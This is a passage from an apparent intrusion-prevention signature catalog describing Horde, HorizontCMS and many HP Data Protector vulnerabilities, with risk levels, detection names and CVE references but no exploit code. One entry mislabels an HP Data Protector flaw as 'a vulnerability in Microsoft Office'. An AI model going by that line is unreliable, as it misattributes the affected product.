https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1691
Back to top

Horde-Webmail-Form-File-Upload

About this vulnerability: A vulnerability in Horde Webmail
Risk: High
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Horde
Type: Insecure Configuration
Description: A vulnerability in Horde Groupware Webmail, versions 5.2.22 and 5.2.17, which allows remote attackers to execute arbitrary code through a vulnerable form that handles image uploads.
Situation: HTTP_CRL-Horde-Webmail-Form-File-Upload
References:
CVE-2019-9858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9858
Back to top

Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization

About this vulnerability: A vulnerability in Horde Webmail
Risk: Moderate
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: Horde
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Horde Groupware Webmail Edition. This vulnerability is due to improper input validation of the source parameter used for fetching an address book configuration. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation can result in arbitrary code execution under the security context of the affected server.
Situation: HTTP_CRL-Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization
References:
CVE-2022-30287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30287
Back to top

HorizontCMS-Arbitrary-PHP-File-Upload

About this vulnerability: A vulnerability in HorizontCMS
Risk: High
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Linux; Windows
Software: HorizontCMS
Type: Input Validation
Description: There exists a vulnerability in HorizontCMS, version 1.0.0-beta, which allows remote attackers to upload arbitrary php files and execute commands via a POST to /admin/file-manager/fileupload.
Situation: HTTP_CS-HorizontCMS-Arbitrary-PHP-File-Upload
References:
CVE-2020-27387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27387
Back to top

Hosting-Controller-FilePath-Parameter-File-Disclosure

About this vulnerability: File disclosure vulnerability in Hosting Controller
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Hosting Controller
Type: Malfunction
Description: Hosting Controller administrative hosting tool for Microsoft Windows could allow a remote authenticated attacker to obtain sensitive information. A remote attacker could send a specially-crafted HTTP request to the Statsbrowse.asp or Generalbrowser.asp script to view arbitrary files on the system.
References:
CVE-2004-1217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1217
BID-11822
http://www.securityfocus.com/bid/11822
Back to top

Hotbar

About this vulnerability: Hotbar Internet Explorer Toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Hotbar
Type: Misconfiguration
Description: Hotbar is an Internet Explorer toolbar that may show advertisement popups. It is bundled with for example the BeatShare file sharing software. Some organizations may consider the Hotbar software unwanted.
Situation: HTTP_CSU-Hotbar-Activity
HTTP_CSH-Hotbar-Install
HTTP_CSH-Hotbar-Activity
HTTP_CSH-Hotbar-Weather-Service-Activity
Back to top

HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Application Information Optimizer
Risk: Moderate
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Application Information Optimizer
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in HP Application Information Optimizer. The vulnerability exists in oasoa.exe which listens by default on port 19988. The vulnerability is due to insufficient sanitization on the range of the opcode value. A remote unauthenticated attacker can leverage this vulnerability by sending crafted messages to the server. This can lead to arbitrary code execution within the SYSTEM context.
Situation: Generic_CS-HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow
References:
CVE-2013-6189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6189
OSVDB-101564
http://www.osvdb.org/101564
Back to top

HP-Application-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in HP Lifecycle Management ActiveX
Risk: Moderate
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Lifecycle Management ActiveX
Type: Directory Traversal
Description: A directory traversal and file overwrite vulnerability exists in the HP Application Lifecycle Management ActiveX control XGO.ocx. The vulnerability is caused by exposing the CopyToFile function which fails to validate the filename parameter and allows the overwriting of system files. An attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could result in code execution in the context of the currently logged in user.
Situation: File-Text_HP-App-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite
References:
OSVDB-85059
http://www.osvdb.org/85059
Back to top

HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure

About this vulnerability: A vulnerability in HP Lifecycle Management ActiveX
Risk: Moderate
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Lifecycle Management ActiveX
Type: Malfunction
Description: There is an insecure method exposure vulnerability in HP Application Lifecycle Management ActiveX control XGO.ocx. The vulnerability is caused by SetShapeNodeType function which exposes a parameter that can be used to control a function pointer. An attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could result in code execution in the context of the currently logged in user.
Situation: File-Text_HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure
References:
OSVDB-85152
http://www.osvdb.org/85152
Back to top

HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Data Protector
Type: Buffer Overflow
Description: A code execution vulnerability exists in HP Data Protector Backup Client Service. The vulnerability is due to a buffer overflow in the processing of GET_FILE messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted request to the target service.
Situation: Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow
Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow-2
References:
CVE-2011-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1729
BID-47638
http://www.securityfocus.com/bid/47638
OSVDB-72188
http://www.osvdb.org/72188
Back to top

HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Data Protector
Type: Input Validation
Description: A directory traversal vulnerability exists in HP Data Protector Backup Client Service. The vulnerability is due to insufficient sanitization in the processing of the GET_FILE messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted request message to the target service.
Situation: Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal
References:
CVE-2011-1736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1736
BID-47638
http://www.securityfocus.com/bid/47638
OSVDB-72195
http://www.osvdb.org/72195
Back to top

HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution

About this vulnerability: A vulnerability in HP Data Protector
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Data Protector
Type: Malfunction
Description: A code execution vulnerability exists in HP Data Protector Client agent software. The vulnerability is due to a design weakness in the processing of the EXEC_SETUP messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted command to the target service. Successful exploitation would allow attackers to load and execute arbitrary programs from a remote SMB share with the privileges of the affected service application which runs under the SYSTEM user on Windows platform. The vendor has not provided any patch as of yet. As a workaround, allow only trusted users to access the vulnerable systems.
Situation: Generic_CS-HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution
References:
CVE-2011-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0922
BID-46234
http://www.securityfocus.com/bid/46234
Back to top

HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Data Protector
Type: Malfunction
Description: A remote code execution vulnerability has been reported in the HP Data Protector Client. The vulnerability is due to insufficient input validation of arguments passed to the EXEC_CMD command. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted input to the EXEC_CMD command.
Situation: Generic_CS-HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution
Generic_CS-HP-Data-Protector-Directory-Traversal
References:
CVE-2011-0923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0923
BID-46234
http://www.securityfocus.com/bid/46234
OSVDB-72526
http://www.osvdb.org/72526
Back to top

HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Data Protector. The vulnerability exists in the Cell Request Service (CRS.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcodes 207, 210, 236, 243, and 265 which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow
References:
CVE-2013-2324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2324
OSVDB-93858
http://www.osvdb.org/93858
Back to top

HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: Multiple stack buffer overflows exist in HP Data Protector. The vulnerabilities are due to a lack of input sanitization on Strings provided with various opcodes. The strings are not validated for length before being copied into a fixed-size stack buffer. A remote unauthenticated attacker could exploit these vulnerabilities by sending a crafted request to the vulnerable service. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows
References:
CVE-2013-6195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6195
OSVDB-101631
http://www.osvdb.org/101631
Back to top

HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with the opcode 1091, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow
References:
CVE-2013-2334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2334
OSVDB-93868
http://www.osvdb.org/93868
Back to top

HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe services, which listens on a randomly chosen port. The application fails to sanitize input with opcode 1092, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow
References:
CVE-2013-2331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2331
OSVDB-93865
http://www.osvdb.org/93865
Back to top

HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 211, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow
References:
CVE-2013-2333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2333
OSVDB-93867
http://www.osvdb.org/93867
Back to top

HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: Two stack buffer overflows have been discovered in HP Data Protector. The vulnerabilities exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 215 or 263, which can result in two stack buffer overflows. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow
References:
CVE-2013-2328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2328
OSVDB-93862
http://www.osvdb.org/93862
Back to top

HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been discovered in HP Data Protector. The vulnerability exists in the Cell Request Service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 227, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow
References:
CVE-2013-2335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2335
BID-60311
http://www.securityfocus.com/bid/60311
OSVDB-93869
http://www.osvdb.org/93869
Back to top

HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: There is a buffer overflow in HP Data Protector. The vulnerability exists in the Cell Request Service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 234, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow
References:
CVE-2013-2326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2326
OSVDB-93860
http://www.osvdb.org/93860
Back to top

HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 235, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow
References:
CVE-2013-2325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2325
OSVDB-93859
http://www.osvdb.org/93859
Back to top

HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 259, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow
References:
CVE-2013-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2329
OSVDB-93863
http://www.osvdb.org/93863
Back to top

HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 260, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow
References:
CVE-2013-2332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2332
OSVDB-93866
http://www.osvdb.org/93866
Back to top

HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 264, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow
References:
CVE-2013-2327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2327
OSVDB-93861
http://www.osvdb.org/93861
Back to top

HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 305, which can result in a stack-based buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is System on Windows systems by default.
Situation: Generic_CS-HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow
References:
CVE-2013-2330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2330
OSVDB-93864
http://www.osvdb.org/93864
Back to top

HP-Data-Protector-Exec_Bar-Command-Execution

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Input Validation
Description: A command execution vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a string provided with Opcode 11. The string is not sanitized before being used in a call to CreateProcess. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in command execution in the context of the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Exec_Bar-Command-Execution
References:
CVE-2013-2347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2347
OSVDB-101626
http://www.osvdb.org/101626
Back to top

HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in HP Data Protector Express
Risk: Critical
First detected in: sgpkg-ips-345-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Data Protector Application Recovery Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Data Protector Express.
Situation: Generic_CS-HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow
References:
CVE-2010-3007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3007
BID-43105
http://www.securityfocus.com/bid/43105
OSVDB-67973
http://www.osvdb.org/67973
Back to top

HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows

About this vulnerability: A vulnerability in HP Data Protector Express
Risk: High
First detected in: sgpkg-ips-465-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Express
Type: Buffer Overflow
Description: There is a stack buffer overflow in HP Data Protector Express. The vulnerability is due to insufficient validation of incoming messages with various opcodes. A remote, unauthenticated attacker can exploit the vulnerability by sending a malformed message with one of the affected opcodes to the server. Successful exploitation would lead to execution of arbitrary attacker code in the security context of the affected application, which is SYSTEM. If the attack fails, the application may crash resulting in a denial-of-service condition.
Situation: Generic_CS-HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows
References:
CVE-2012-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0121
BID-52431
http://www.securityfocus.com/bid/52431
OSVDB-80102
http://www.osvdb.org/80102
Back to top

HP-Data-Protector-Express-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in HP Data Protector Express detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Data Protector Express
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in HP Data Protector Express, 5.0.00 before build 59287 and 6.0.00 before build 11974, in the insecure way that folders are created, which allows remote attackers to execute arbitrary code or cause a denial of service condition.
Situation: Generic_CS-HP-Data-Protector-Express-Stack-Based-Buffer-Overflow
References:
CVE-2012-0124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0124
BID-52431
http://www.securityfocus.com/bid/52431
OSVDB-80105
http://www.osvdb.org/80105
Back to top

HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP Data Protector manager server
Risk: Critical
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP Data Protector Media Operations
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Data Protector manager server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted packet to the vulnerable service to execute arbitrary programs with the privileges of the affected service.
Situation: Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-DOS
References:
BID-45128
http://www.securityfocus.com/bid/45128
Back to top

HP-Data-Protector-Manager-RDS-Denial-Of-Service

About this vulnerability: A vulnerability in HP Data Protector
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Malfunction
Description: There is a denial of service vulnerability in HP Data Protector Manager RDS service. The vulnerability is due to a design error while handling packets containing an overly large size value. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted packet to the vulnerable service on the target server. Successful exploitation would terminate the RDS service.
Situation: Generic_CS-HP-Data-Protector-Manager-RDS-Denial-Of-Service
References:
CVE-2011-0514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0514
BID-45725
http://www.securityfocus.com/bid/45725
OSVDB-70617
http://www.osvdb.org/70617
Back to top

HP-Data-Protector-Media-Operations-Denial-Of-Service

About this vulnerability: A vulnerability in HP Data Protector Media Operations
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Media Operations
Type: Malfunction
Description: A denial of service vulnerability exists in HP Data Protector Media Operations. The flaw is due to a null pointer dereference error in DBServer.exe when parsing malformed requests sent to a target server. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server over TCP (default port 19813). Successful exploitation will cause the target service to terminate abnormally resulting in a denial of service condition.
Situation: Generic_CS-HP-Data-Protector-Media-Operations-Denial-Of-Service
Back to top

HP-Data-Protector-Media-Operations-Directory-Traversal

About this vulnerability: A vulnerability in HP Data Protector Media Operations
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Media Operations
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in HP Data Protector Media Operations. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to port 19813/TCP of the server running the vulnerable product. In the case of successful exploitation, the vulnerability allows downloading of arbitrary files from the drive on which the product is installed.
Situation: Generic_CS-HP-Data-Protector-Media-Operations-Directory-Traversal
References:
OSVDB-76841
http://www.osvdb.org/76841
Back to top

HP-Data-Protector-Media-Operations-Memory-Corruption

About this vulnerability: A vulnerability in HP Data Protector Media Operations
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Media Operations
Type: Malfunction
Description: There is a heap memory corruption vulnerability in HP Data Protector Media Operations. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to port 19813/TCP of the server running the vulnerable product. In the case of successful exploitation execution of arbitrary attacker code may result.
Situation: Generic_CS-HP-Data-Protector-Media-Operations-Memory-Corruption
References:
OSVDB-76842
http://www.osvdb.org/76842
Back to top

HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow

About this vulnerability: A denial of service vulnerability in HP Data Protector Media Operations
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Media Operations
Type: Malfunction
Description: There is a denial of service vulnerability in HP Data Protector Media Operations. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to cause a denial of service condition.
Situation: HTTP_CRL-HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow
References:
BID-44381
http://www.securityfocus.com/bid/44381
OSVDB-68528
http://www.osvdb.org/68528
Back to top

HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection

About this vulnerability: A vulnerability in HP Data Protector for Personal Computers
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: SQL Injection
Description: There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the type field in a user supplied SOAP request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.
Situation: HTTP_CS-HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection
References:
CVE-2011-3162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3162
OSVDB-76707
http://www.osvdb.org/76707
Back to top

HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection

About this vulnerability: A vulnerability in HP Data Protector for Personal Computers
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Input Validation
Description: There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the clientVersion field in a user supplied request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.
Situation: HTTP_CS-HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection
References:
CVE-2011-3157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3157
OSVDB-76702
http://www.osvdb.org/76702
Back to top

HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection

About this vulnerability: A vulnerability in HP Data Protector for Personal Computers
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: SQL Injection
Description: There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the userid field in a user supplied request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.
Situation: HTTP_CS-HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection
References:
CVE-2011-3156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3156
OSVDB-76701
http://www.osvdb.org/76701
Back to top

HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection

About this vulnerability: A vulnerability in HP Data Protector for Personal Computers
